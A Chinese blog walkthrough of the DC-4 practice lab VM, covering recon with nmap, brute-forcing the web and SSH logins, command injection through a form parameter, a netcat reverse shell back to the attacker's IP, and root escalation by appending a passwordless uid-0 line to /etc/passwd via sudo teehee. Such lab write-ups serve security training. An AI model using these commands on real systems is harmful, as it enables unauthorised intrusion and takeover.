DC--4

最新推荐文章于 2023-03-21 09:21:51 发布
最新推荐文章于 2023-03-21 09:21:51 发布
阅读量99 收藏
点赞数
分类专栏: DC系列 文章标签: 信息安全 主机渗透 DC系列 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42248871/article/details/128440539
版权

信息收集

确定主机IP地址

netdiscover -i eth0 -r 192.168.84.0/24

image-20221215165801541

扫描端口信息

image-20221215165844978

nmap 鉴权

nmap 192.168.84.180 -sV -A -p 80 --script=vuln

image-20221216122437915

WEB测试

访问靶机的80端口

image-20221216122919992

由网页提示用户可能是admin,针对admin用户进行暴力破解

burp抓包请求包,进行暴力破解

密码为happy

image-20221216124344011

登录成功

image-20221216124439890

该页面,通过点击不同的功能按钮,得到不同的结果,猜测可能是执行了不同的命令

image-20221216124637171

burp抓包发现,传参的是Linux命令,且与功能按钮点匹配

image-20221216124759884

修改传参点,会怎么样呢?

image-20221216124853053

执行反弹shell

目标上执行

nc+192.168.84.174+10086+-e+/bin/bash
192.168.84.174 -- 攻击机IP地址
10086 -- 攻击机的端口

image-20221216125620309

攻击机上进行端口的监听

image-20221216125637116

获取标准的shell

python -c 'import pty;pty.spawn("/bin/bash")'

image-20221216130114054

提权

读取passwd文件发现有三个普通用户,然后分别进行了查看

image-20221216130236320

查看每个用户的家目录-在jim用户的家目录发现了old-password文件

image-20221216130339541

image-20221216130525681

由于开放了22端口,则对jim用户进行ssh服务爆破

hydra -l jim -P ./jim-oldpasswd.txt 192.168.84.180 ssh
jim-oldpasswd.txt为jim家目录下的old-passwords.bak文件

image-20221216131448827

登录jim用户

image-20221216131704199

在/var/mail下有封邮件

image-20221216131934526

得知charles用户的密码为^xHhA&hvim0y,登录成功

image-20221216132430952

发现teehee 不需要root的用户密码

image-20221216132728313

teehee

teehee是个小众的linux编辑器,如果有sudo权限,可以利用其来提权

核心思路就是利用其在passwd文件中追加一条uid为0的用户条目

例如:echo "xbxaq::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

按照linux用户机制,如果没有shadow条目,且passwd用户密码条目为空的时候,可以本地直接su空密码登录。
所以只需要执行su xbxaq就可以登录到xbxaq用户,这个用户因为uid为0,所以也是root权限

passwd的格式:[⽤户名]:[密码]:[UID]:[GID]:[⾝份描述]:[主⽬录]:[登录shell]

提权命令

 echo 'xbxaq::0:0:root:/root:/bin/bash' | sudo teehee -a /etc/passwd

image-20221216161831807

image-20221216161938563

小白学安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC-DC PCB layout 指导.docx
06-18
DC-DC PCB layout 指导.docx
DC-4靶机渗透测试详细教程
啊醒的博客
05-04 3442
DC-4靶机渗透测试详细教程
DC-DC降压IC
weixin_50697266的博客
06-21 2035
DC-DC降压IC 深圳市航誉微电子有限公司型号输入 耐压输出电压输出 电流反馈 电压工作 频率效率静态 工作 电流待机 电流封装直接替换LM259645V5.0V/ 可调输出/ 3.3V/12V3A1.23V150K90% (Max)10mA80uATO-263-5L TO-220-5LLM2596/AP1501LM2596HV63V5.0V/ 可调输出/
名词解释:DC-13
qq_43009770的博客
03-02 1177
就用满足DC-13的负载去接输出,输出不挂掉那就说明产品输出带感性负载能力在DC-13。额定电流I/Ie = 1.1,额定电压U/Ue = 1.1 ,至于T0.95 = 300ms和180ms,没看懂。T0.95 是个指标,指定信号电流的上升时间。是IEC60947-5-1中定义的一种负载。输出的感性负载驱动能力用什么来评估?make(闭合)break断开。DC-13是负载的使用分类。感性负载指标:DC-13。
DC-DC产生负电压
mainbanp
03-21 1335
产生一个负电压使用。实现方法来源。
DC-4靶机练习
千寻的博客
01-02 3034
DC-4靶机练习 第一步 扫描主机 [nmap -sP 192.168.139.0/24] 第二步 扫描端口 [nmap -A 192.168.139.147 -p 1-65535] 第三步 访问80网页 第四步 尝试使用burp获取账号和密码 Kali的浏览器中安装插件 proxy switch 打开burpon 打开抓包 [cat /usr/share/john/password.l...
DC-DC变换器Simulink仿真模型
08-07
本人在Simulink平台搭建的DC-DC变换器仿真模型,可以使用构成你自己模型的一部分。
DC-UPS
03-23
介绍了关于DC-UPS的详细说明,提供不间断电源UP的技术资料的下载。
dc-vue:基于VueCli4.xx和DC-SDK构建的三维应用脚手架,用于开发三维WebGis项目
02-14
Vue直流 该脚手架是将Vue与DC-SDK结合,方便用户可以快速建造3DGis项目 启动 yarn run serve 打包 yarn run build 配置说明 请看vue.config.js
DC-DC电路设计技巧及器件选型原则
03-24
DC-DC电路设计技巧及器件选型原则
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8190
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Elasticsearch初识与简单案例.pdf
04-29
Elasticsearch是一个基于Lucene的分布式全文搜索引擎,提供灵活且高效的搜索和分析功能。通过HTTP请求和客户端库,用户可以索引和搜索文档,执行复杂查询,进行数据分析,并享受高亮显示等特性。其高级功能如复合查询、聚合分析、滚动搜索等,使其适用于各种数据处理和分析场景。Elasticsearch还具有强大的监控和日志功能,确保集群稳定运行。总之,Elasticsearch是企业级搜索和分析的理想选择。
Python基于LSTM模型对全国的空气质量数据进行可视化分析预测源代码
04-29
介绍 对全国2019年1月至2023年12月的空气质量数据进行分析,绘制时间序列图,展示每月/每季度的平均AQI变化趋势。绘制不同省份和城市的平均AQI热力图。分析不同污染物的浓度分布和趋势。绘制空气质量等级分布图。 需求说明 对空气质量数据进行数据分析,并使用LSTM模型进行预测。 安装教程 pip install jupyter pip install numpy pandas matplotlib seaborn 使用说明 在项目路径下打开终端输入jupyter notebook就行
百问网linux桌面GUI,基于LVGL 8.x。.zip
04-29
百问网linux桌面GUI,基于LVGL 8.x。
基于Vue开发的XMall商城前台页面 PC端.zip
04-29
基于Vue开发的XMall商城前台页面 PC端.zip
2019年中国民航大学电子设计竞赛E题-自动导航运输车
04-29
2019年中国民航大学电子设计竞赛E题-自动导航运输车 全国大学生电子设计竞赛(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电赛的同学可以用来学习提升和参考
精灵宝可梦go游戏UI界面设计PSD源文件.zip
04-29
游戏开发资源,游戏UI,游戏GUI,游戏图标,PSD格式,XD格式,PNG下载,源文件,可编辑下载,游戏购物充值界面,宝石,图标,PS格式,AI格式等,游戏APP
线索二叉树的实现.doc
04-29
(1)逻辑设计:写出抽象数据类型的定义,各个主要模块的算法,并画出模块之间的调用关系图; (2)详细设计:定义相应的存储结构并写出各函数的伪码算法。 (3)程序编码:把详细设计的结果进二步求精为程序设计语言程序。 (4)程序调试与测试:采用自底向上,分模块进行,即先调试低层函数。 (5)结果分析:程序运行结果包括正确的输入及其输出结果和含有错误的输入及其输出结果。算法的时间、空间复杂性分析; 效果表现为用户输入一串字符表示的先序序列,程序能够根据这个序列正确地建立二叉树,并通过中序线索化非递归遍历结果。这有助于验证二叉树结构和遍历算法的正确性,同时对于理解和操作二叉树数据结构非常有帮助。 程序的输出结果证明了其对二叉树操作的正确性和有效性。
资源【STM32+HAL】SDIO模式读写SD卡
最新发布
04-29
​ 一、准备工作 有关CUBEMX的初始化配置,参见我的另一篇blog:【STM32+HAL】CUBEMX初始化配置 二、所用工具 1、芯片: STM32F407VET6 2、IDE: MDK-Keil软件 3、库文件:STM32F4xxHAL库 三、实现功能 实现用DMA读写SD卡内容 ​
DC-022-20A
01-16
DC-022-20A是一种直流电源接口,可以支持最大电流为20A的电路。它通常用于连接电源和电路板,以提供稳定的电源供应。这种接口具有较高的电流承载能力,适用于一些需要大电流的应用场景。 以下是一个使用DC-022-20A...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值